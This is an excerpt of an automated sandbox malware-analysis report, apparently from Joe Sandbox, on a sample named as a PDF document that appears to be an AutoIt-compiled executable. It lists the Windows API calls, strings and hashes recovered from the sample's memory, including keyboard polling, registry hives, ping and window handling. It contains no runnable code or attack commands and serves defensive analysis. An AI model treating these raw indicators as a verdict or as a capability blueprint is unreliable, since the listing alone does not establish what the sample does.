                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                            • String ID: 0
                                                            • API String ID: 1296962147-4108050209
                                                            • Opcode ID: 8bbf5efec4124dab2a71efe4a215319dc9df792854e6e50c53c520b29b0d1c2d
                                                            • Instruction ID: 5fe471250664d2c3dd53482974dac69a39938bac7209cb9e97c983adb7281f43
                                                            • Opcode Fuzzy Hash: 8bbf5efec4124dab2a71efe4a215319dc9df792854e6e50c53c520b29b0d1c2d
                                                            • Instruction Fuzzy Hash: A0819E70608301AFD714CF14C984AABBBF8FB98314F10852DF99997291DB71D985CFA2
                                                            APIs
                                                              • Part of subcall function 0014874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00148766
                                                              • Part of subcall function 0014874A: GetLastError.KERNEL32(?,0014822A,?,?,?), ref: 00148770
                                                              • Part of subcall function 0014874A: GetProcessHeap.KERNEL32(00000008,?,?,0014822A,?,?,?), ref: 0014877F
                                                              • Part of subcall function 0014874A: HeapAlloc.KERNEL32(00000000,?,0014822A,?,?,?), ref: 00148786
                                                              • Part of subcall function 0014874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0014879D
                                                              • Part of subcall function 001487E7: GetProcessHeap.KERNEL32(00000008,00148240,00000000,00000000,?,00148240,?), ref: 001487F3
                                                              • Part of subcall function 001487E7: HeapAlloc.KERNEL32(00000000,?,00148240,?), ref: 001487FA
                                                              • Part of subcall function 001487E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00148240,?), ref: 0014880B
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00148458
                                                            • _memset.LIBCMT ref: 0014846D
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0014848C
                                                            • GetLengthSid.ADVAPI32(?), ref: 0014849D
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 001484DA
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001484F6
                                                            • GetLengthSid.ADVAPI32(?), ref: 00148513
                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00148522
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00148529
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0014854A
                                                            • CopySid.ADVAPI32(00000000), ref: 00148551
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00148582
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001485A8
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001485BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                            • String ID:
                                                            • API String ID: 3996160137-0
                                                            • Opcode ID: 365533409a453183f1cdd711cf2dd96442d6c173ccab574c98532f302c0a2ebe
                                                            • Instruction ID: d895895e75a4e4f875bb5f6d1333e30c535b78f20684e301ebf7769f6701fc70
                                                            • Opcode Fuzzy Hash: 365533409a453183f1cdd711cf2dd96442d6c173ccab574c98532f302c0a2ebe
                                                            • Instruction Fuzzy Hash: 1561387190021AAFDF10DFA4DC45AEEBBB9FF04304F148269F915AB2A1DB319A45DF60
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 001676A2
                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 001676AE
                                                            • CreateCompatibleDC.GDI32(?), ref: 001676BA
                                                            • SelectObject.GDI32(00000000,?), ref: 001676C7
                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0016771B
                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00167757
                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0016777B
                                                            • SelectObject.GDI32(00000006,?), ref: 00167783
                                                            • DeleteObject.GDI32(?), ref: 0016778C
                                                            • DeleteDC.GDI32(00000006), ref: 00167793
                                                            • ReleaseDC.USER32(00000000,?), ref: 0016779E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                            • String ID: (
                                                            • API String ID: 2598888154-3887548279
                                                            • Opcode ID: dc399b8280b03573b6d3bd5792587203c47428d4cc9fbc085aedbddf78080cfa
                                                            • Instruction ID: 957edaa905a1985c631fc04b88cc33864103ce8e1829480fd2b6006176fd7cd6
                                                            • Opcode Fuzzy Hash: dc399b8280b03573b6d3bd5792587203c47428d4cc9fbc085aedbddf78080cfa
                                                            • Instruction Fuzzy Hash: DF515775904209EFDB15CFA8CC88EAFBBB9EF48710F14842DF94A97250D731A881CB60
                                                            APIs
                                                            • LoadStringW.USER32(00000066,?,00000FFF,0017FB78), ref: 0015A0FC
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                            • LoadStringW.USER32(?,?,00000FFF,?), ref: 0015A11E
                                                            • __swprintf.LIBCMT ref: 0015A177
                                                            • __swprintf.LIBCMT ref: 0015A190
                                                            • _wprintf.LIBCMT ref: 0015A246
                                                            • _wprintf.LIBCMT ref: 0015A264
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 311963372-2391861430
                                                            • Opcode ID: 8327fb51d13fc0b71eaccf09ae6a337afb4ebe1ba15e082cf689410a6938dc05
                                                            • Instruction ID: 809dda5b22cdc79352cffc7a54bd60f96ab8de50f68f0182e090a756bf29ef21
                                                            • Opcode Fuzzy Hash: 8327fb51d13fc0b71eaccf09ae6a337afb4ebe1ba15e082cf689410a6938dc05
                                                            • Instruction Fuzzy Hash: CE51803194020DAADF15EBE0CD86EFEB779AF14300F500265F619625A2DB316F98DB52
                                                            APIs
                                                              • Part of subcall function 00110B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,000F6C6C,?,00008000), ref: 00110BB7
                                                              • Part of subcall function 000F48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000F48A1,?,?,000F37C0,?), ref: 000F48CE
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 000F6D0D
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 000F6E5A
                                                              • Part of subcall function 000F59CD: _wcscpy.LIBCMT ref: 000F5A05
                                                              • Part of subcall function 0011387D: _iswctype.LIBCMT ref: 00113885
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                            • API String ID: 537147316-1018226102
                                                            • Opcode ID: 9a145e8aab7f161ab1cfe9b907594f0d69eb531f875f5e64fc3628fcb4106897
                                                            • Instruction ID: 123ca2f3d873786fd7e6d385e188c3ac9f5f689c2ecad603c73b87b0ef91f375
                                                            • Opcode Fuzzy Hash: 9a145e8aab7f161ab1cfe9b907594f0d69eb531f875f5e64fc3628fcb4106897
                                                            • Instruction Fuzzy Hash: B802AC315083459FC724EF24C881AAFBBE5BF99314F04092DF68A976A2DB31D949DB43
                                                            APIs
                                                            • _memset.LIBCMT ref: 000F45F9
                                                            • GetMenuItemCount.USER32(001B6890), ref: 0012D7CD
                                                            • GetMenuItemCount.USER32(001B6890), ref: 0012D87D
                                                            • GetCursorPos.USER32(?), ref: 0012D8C1
                                                            • SetForegroundWindow.USER32(00000000), ref: 0012D8CA
                                                            • TrackPopupMenuEx.USER32(001B6890,00000000,?,00000000,00000000,00000000), ref: 0012D8DD
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0012D8E9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                            • String ID:
                                                            • API String ID: 2751501086-0
                                                            • Opcode ID: 8c2e469afbe4fee58d64876d135e14843481f06647a476aafb54cec4e9dc4e60
                                                            • Instruction ID: 87d5c264089e4a46d8bbfd4c4668ce0df6a447605342f0fa83c41c049a1141cc
                                                            • Opcode Fuzzy Hash: 8c2e469afbe4fee58d64876d135e14843481f06647a476aafb54cec4e9dc4e60
                                                            • Instruction Fuzzy Hash: C071E771600219BEFB249F54EC85FABBF64FF05368F204216FA28A61E1C7B55860DB91
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00170038,?,?), ref: 001710BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                            APIs
                                                              • Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66
                                                              • Part of subcall function 000F7A84: _memmove.LIBCMT ref: 000F7B0D
                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 001555D2
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 001555E8
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001555F9
                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0015560B
                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0015561C
                                                            Strings
                                                            Similarity
                                                            • API ID: SendString$_memmove
                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            APIs
                                                            • timeGetTime.WINMM ref: 0015521C
                                                              • Part of subcall function 00110719: timeGetTime.WINMM(?,7694B400,00100FF9), ref: 0011071D
                                                            • Sleep.KERNEL32(0000000A), ref: 00155248
                                                            • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0015526C
                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0015528E
                                                            • SetActiveWindow.USER32 ref: 001552AD
                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001552BB
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 001552DA
                                                            • Sleep.KERNEL32(000000FA), ref: 001552E5
                                                            • IsWindow.USER32 ref: 001552F1
                                                            • EndDialog.USER32(00000000), ref: 00155302
                                                            Strings
                                                            Similarity
                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                            • String ID: BUTTON
                                                            APIs
                                                              • Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
                                                              • Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C
                                                            • CoInitialize.OLE32(00000000), ref: 0015D855
                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0015D8E8
                                                            • SHGetDesktopFolder.SHELL32(?), ref: 0015D8FC
                                                            • CoCreateInstance.OLE32(00182D7C,00000000,00000001,001AA89C,?), ref: 0015D948
                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0015D9B7
                                                            • CoTaskMemFree.OLE32(?,?), ref: 0015DA0F
                                                            • _memset.LIBCMT ref: 0015DA4C
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0015DA88
                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0015DAAB
                                                            • CoTaskMemFree.OLE32(00000000), ref: 0015DAB2
                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0015DAE9
                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 0015DAEB
                                                            Similarity
                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                            • String ID:
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 001505A7
                                                            • SetKeyboardState.USER32(?), ref: 00150612
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00150632
                                                            • GetKeyState.USER32(000000A0), ref: 00150649
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00150678
                                                            • GetKeyState.USER32(000000A1), ref: 00150689
                                                            • GetAsyncKeyState.USER32(00000011), ref: 001506B5
                                                            • GetKeyState.USER32(00000011), ref: 001506C3
                                                            • GetAsyncKeyState.USER32(00000012), ref: 001506EC
                                                            • GetKeyState.USER32(00000012), ref: 001506FA
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00150723
                                                            • GetKeyState.USER32(0000005B), ref: 00150731
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000001), ref: 0014C746
                                                            • GetWindowRect.USER32(00000000,?), ref: 0014C758
                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0014C7B6
                                                            • GetDlgItem.USER32(?,00000002), ref: 0014C7C1
                                                            • GetWindowRect.USER32(00000000,?), ref: 0014C7D3
                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0014C827
                                                            • GetDlgItem.USER32(?,000003E9), ref: 0014C835
                                                            • GetWindowRect.USER32(00000000,?), ref: 0014C846
                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0014C889
                                                            • GetDlgItem.USER32(?,000003EA), ref: 0014C897
                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0014C8B4
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0014C8C1
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            APIs
                                                              • Part of subcall function 000F1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000F2036,?,00000000,?,?,?,?,000F16CB,00000000,?), ref: 000F1B9A
                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 000F20D3
                                                            • KillTimer.USER32(-00000001,?,?,?,?,000F16CB,00000000,?,?,000F1AE2,?,?), ref: 000F216E
                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 0012BEF6
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000F16CB,00000000,?,?,000F1AE2,?,?), ref: 0012BF27
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000F16CB,00000000,?,?,000F1AE2,?,?), ref: 0012BF3E
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000F16CB,00000000,?,?,000F1AE2,?,?), ref: 0012BF5A
                                                            • DeleteObject.GDI32(00000000), ref: 0012BF6C
                                                            Similarity
                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                            • String ID:
                                                            APIs
                                                              • Part of subcall function 000F25DB: GetWindowLongW.USER32(?,000000EB), ref: 000F25EC
                                                            • GetSysColor.USER32(0000000F), ref: 000F21D3
                                                            Similarity
                                                            • API ID: ColorLongWindow
                                                            • String ID:
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,0017F910), ref: 0015AB76
                                                            • GetDriveTypeW.KERNEL32(00000061,001AA620,00000061), ref: 0015AC40
                                                            • _wcscpy.LIBCMT ref: 0015AC6A
                                                            Strings
                                                            Similarity
                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            APIs
                                                            Strings
Similarity
• API ID: __i64tow__itow__swprintf
• String ID: %.15g$0x%p$False$True
• API String ID: 421087845-2263619337
APIs
• _memset.LIBCMT ref: 001773D9
• CreateMenu.USER32 ref: 001773F4
• SetMenu.USER32(?,00000000), ref: 00177403
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00177490
• IsMenu.USER32(?), ref: 001774A6
• CreatePopupMenu.USER32 ref: 001774B0
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001774DD
• DrawMenuBar.USER32 ref: 001774E5
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0$F
• API String ID: 176399719-3044882817
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 001777CD
• CreateCompatibleDC.GDI32(00000000), ref: 001777D4
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 001777E7
• SelectObject.GDI32(00000000,00000000), ref: 001777EF
• GetPixel.GDI32(00000000,00000000,00000000), ref: 001777FA
• DeleteDC.GDI32(00000000), ref: 00177803
• GetWindowLongW.USER32(?,000000EC), ref: 0017780D
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00177821
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0017782D
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
APIs
• _memset.LIBCMT ref: 0011707B
  • Part of subcall function 00118D68: __getptd_noexit.LIBCMT ref: 00118D68
• __gmtime64_s.LIBCMT ref: 00117114
• __gmtime64_s.LIBCMT ref: 0011714A
• __gmtime64_s.LIBCMT ref: 00117167
• __allrem.LIBCMT ref: 001171BD
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001171D9
• __allrem.LIBCMT ref: 001171F0
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0011720E
• __allrem.LIBCMT ref: 00117225
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00117243
• __invoke_watson.LIBCMT ref: 001172B4
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
APIs
• _memset.LIBCMT ref: 00152A31
• GetMenuItemInfoW.USER32(001B6890,000000FF,00000000,00000030), ref: 00152A92
• SetMenuItemInfoW.USER32(001B6890,00000004,00000000,00000030), ref: 00152AC8
• Sleep.KERNEL32(000001F4), ref: 00152ADA
• GetMenuItemCount.USER32(?), ref: 00152B1E
• GetMenuItemID.USER32(?,00000000), ref: 00152B3A
• GetMenuItemID.USER32(?,-00000001), ref: 00152B64
• GetMenuItemID.USER32(?,?), ref: 00152BA9
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00152BEF
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00152C03
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00152C24
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00177214
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00177217
• GetWindowLongW.USER32(?,000000F0), ref: 0017723B
• _memset.LIBCMT ref: 0017724C
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0017725E
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001772D6
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00147135
• SafeArrayAllocData.OLEAUT32(?), ref: 0014718E
• VariantInit.OLEAUT32(?), ref: 001471A0
• SafeArrayAccessData.OLEAUT32(?,?), ref: 001471C0
• VariantCopy.OLEAUT32(?,?), ref: 00147213
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00147227
• VariantClear.OLEAUT32(?), ref: 0014723C
• SafeArrayDestroyData.OLEAUT32(?), ref: 00147249
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00147252
• VariantClear.OLEAUT32(?), ref: 00147264
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0014726F
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
APIs
  • Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
  • Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C
• CoInitialize.OLE32 ref: 00168718
• CoUninitialize.OLE32 ref: 00168723
• CoCreateInstance.OLE32(?,00000000,00000017,00182BEC,?), ref: 00168783
• IIDFromString.OLE32(?,?), ref: 001687F6
• VariantInit.OLEAUT32(?), ref: 00168890
• VariantClear.OLEAUT32(?), ref: 001688F1
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00165AA6
• inet_addr.WSOCK32(?,?,?), ref: 00165AEB
• gethostbyname.WSOCK32(?), ref: 00165AF7
• IcmpCreateFile.IPHLPAPI ref: 00165B05
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00165B75
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00165B8B
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 00165C00
• WSACleanup.WSOCK32 ref: 00165C06
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0015B73B
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0015B7B1
• GetLastError.KERNEL32 ref: 0015B7BB
• SetErrorMode.KERNEL32(00000000,READY), ref: 0015B828
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
APIs
  • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
  • Part of subcall function 0014B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0014B0E7
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 001494F6
• GetDlgCtrlID.USER32 ref: 00149501
• GetParent.USER32 ref: 0014951D
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00149520
• GetDlgCtrlID.USER32(?), ref: 00149529
• GetParent.USER32(?), ref: 00149545
• SendMessageW.USER32(00000000,?,?,00000111), ref: 00149548
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: 83e71aa2bf43adf2b45c15f96abfe11f2f9c39dc11c45bbbdf0aa3c6fe2d6f3e
                                                            • Instruction ID: 93ef688418755ea950dcef2b6ab12c53c4bee48316dc9ebddab3d5fe1e901953
                                                            • Opcode Fuzzy Hash: 83e71aa2bf43adf2b45c15f96abfe11f2f9c39dc11c45bbbdf0aa3c6fe2d6f3e
                                                            • Instruction Fuzzy Hash: B221C174D04208BBCF05AF64CC85DFFBB74EF49310F14012ABA61972A2DB759959DB20
                                                            APIs
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
